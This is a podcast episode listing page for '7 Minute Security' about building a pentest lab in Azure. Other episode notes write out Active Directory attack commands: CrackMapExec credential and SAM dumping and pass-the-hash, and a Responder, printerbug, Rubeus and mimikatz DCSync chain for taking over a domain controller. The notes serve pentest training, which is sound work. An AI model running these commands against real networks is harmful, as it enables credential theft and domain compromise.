7MS #502: Building a Pentest Lab in Azure
7 Minute Security5 Tammi 2022

7MS #502: Building a Pentest Lab in Azure

Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the tips in today's episode will save you some time/headaches/money should you setup a pentesting training camp in the cloud.

Things I like

  • No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.)

  • You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation

Things I don't like

  • VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain:
dsregcmd /leave Add-Computer -DomainName pwn.town -Restart

  • Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode).

  • Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes.

  • Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell.

  • Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they night a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not).

Things that are broken

  • Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh.

  • Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies.

On a personal note, it has been good knowing you because I'm about to spend all my money on a new hobby: indoor skydiving.

Jaksot(682)

7MS #562: Cracking and Mapping and Execing with CrackMapExec

7MS #562: Cracking and Mapping and Execing with CrackMapExec

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically: # General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares # Conduct slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

3 Maalis 202340min

7MS #561: Interview with Chris Furner of Blumira

7MS #561: Interview with Chris Furner of Blumira

Today I sat down with Chris Furner of Blumira to talk about all things cyber insurance. Many of 7MinSec's clients are renewing their policies this time of year, and many are looking into policies for the first time. Naturally, there are a ton of questions to ask and things to think about to make good coverage decisions for your business: How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance? How do I make sure I have the appropriate levels of coverage? What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do? Enjoy the interview, where we cover these questions - and more! And be sure to also check out Blumira's whitepaper on this topic called The State of Cyber Insurance.

24 Helmi 202346min

7MS #560: 7MOOCH - Dolphin Rides Are Done Dude

7MS #560: 7MOOCH - Dolphin Rides Are Done Dude

Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"

17 Helmi 202312min

7MS: #559: Tales of Pentest Pwnage - Part 46

7MS: #559: Tales of Pentest Pwnage - Part 46

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood): Change the Responder.conf file like so: ; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788 Run Responder with --disable-ess flag sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess Use printerbug to coax authentication from a domain controller: sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX Convert hash to make it easier to crack! sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds! Now you can do a Rubeus asktgt with the DC hash: rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!! rubeus.exe ptt /ticket:TICKET GOES HERE Use mimikatz to dump all hashes! mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

10 Helmi 202322min

7MS #558: How to Build a Vulnerable Pentest Lab - Part 2

7MS #558: How to Build a Vulnerable Pentest Lab - Part 2

Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going: Use Youzer to import a bunch of bogus users into your Active Directory: sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv Make a Kerberoastable user: New-AdUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -force) -passThru -PasswordNeverExpires $true enable-adaccount Kerba setspn -a IIS_SITE/brifly-dc01.brily.us:77777 briflyus\kerba

7 Helmi 202322min

7MS #557: Better Passive Network Visibility Using Teleseer

7MS #557: Better Passive Network Visibility Using Teleseer

Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!

27 Tammi 20237min

7MS #556: How to Build a Vulnerable Pentest Lab

7MS #556: How to Build a Vulnerable Pentest Lab

Today's episode is brought to us by our friends at Blumira! Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically: Spinning up a domain controller with a few lines of PowerShell Installing Active Directory Domain Services Setting up an intentionally cruddy password policy Baking in the MS14-025 vulnerability P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options: https://github.com/Orange-Cyberdefense/GOAD https://automatedlab.org/en/latest/ https://github.com/microsoft/MSLab https://github.com/davidprowe/BadBlood https://github.com/cliffe/secgen https://github.com/WazeHell/vulnerable-AD

20 Tammi 20237min

7MS #555: Light Pentest eBook 1.1 Release

7MS #555: Light Pentest eBook 1.1 Release

Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include: Some typos and bug fixes A new section on finding systems with unconstrained delegation and exploiting them A new section on finding easily pwnable passwords via password spraying A new section relaying credentials with MITM6 (be careful using some of its options - read this New ways (and some words of warning) to dump hashes from Active Directory

13 Tammi 20237min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
et-sa-noin-voi-sanoo-esittaa
otetaan-yhdet
politiikan-puskaradio
rss-vaalirankkurit-podcast
rikosmyytit
aihe
the-ulkopolitist
rss-mina-ukkola
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-hyvaa-huomenta-bryssel
rss-kyselytunti
rss-aijat-hopottaa-podcast
rss-kovin-paikka
rss-suoraan-asiaan
rss-kaikki-paskaksi-ystavat
rss-tyolinjalla-pekka-sauri
rss-raha-talous-ja-politiikka